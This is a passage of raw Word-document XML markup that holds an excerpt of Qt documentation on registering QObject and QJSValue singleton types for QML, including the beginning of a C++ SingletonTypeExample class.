          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId218" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>singleton type may be imported and used like any other</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId219" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instance exposed to QML. The following example assumes that a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId220" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>singleton type was registered into the "MyThemeModule" namespace with version 1.0, where that</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId221" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId222" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QColor</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"color"</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId223" w:anchor="Q_PROPERTY" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Q_PROPERTY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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import</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MyThemeModule</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1.0</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as</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Theme</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Rectangle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color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Theme</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color </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// binding.</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1C7F21" w:rsidRDefault="00DA77C2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId224" w:history="1">
        <w:r w:rsidRPr="008B0A55">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QJSValue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may also be exposed as a singleton type, however clients should be aware that properties of such a singleton type cannot be bound to</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C7F21" w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu</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See</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId225" w:anchor="qmlRegisterSingletonType" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterSingletonType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() for more information on how implement and register a new singleton type, and how to use an existing singleton type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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1C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enum values for </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>registered types in QML should start with a capital.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C7F21" w:rsidRDefault="001C7F21" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId226" w:anchor="qmlRegisterSingletonType" w:history="1">
        <w:r w:rsidRPr="00ED7AB1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qqmlengine.html#qmlRegisterSingletonType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</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55FFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// First, define your QObject which provides the functionality.</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55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>class</w:t>
      </w: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4F9D08"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>SingletonTypeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId227" w:history="1">
        <w:r w:rsidRPr="001C7F21">
          <w:rPr>
            <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>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Q_OBJECT</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Q_PROPERTY (</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> someProperty READ someProperty WRITE setSomeProperty NOTIFY somePropertyChanged)</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55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</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4F9D08"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>SingletonTypeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId228" w:history="1">
        <w:r w:rsidRPr="001C7F21">
          <w:rPr>
            <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">* parent = </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId229" w:history="1">
        <w:r w:rsidRPr="001C7F21">
          <w:rPr>
            <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(parent), m_someProperty(</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</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4F9D08"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>SingletonTypeExample</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>() {}</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Q_INVOKABLE </w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> doSomething() { setSomeProperty(</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>5</w:t>
      </w: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FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_someProperty; }</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FFFF55"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="001C7F21">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
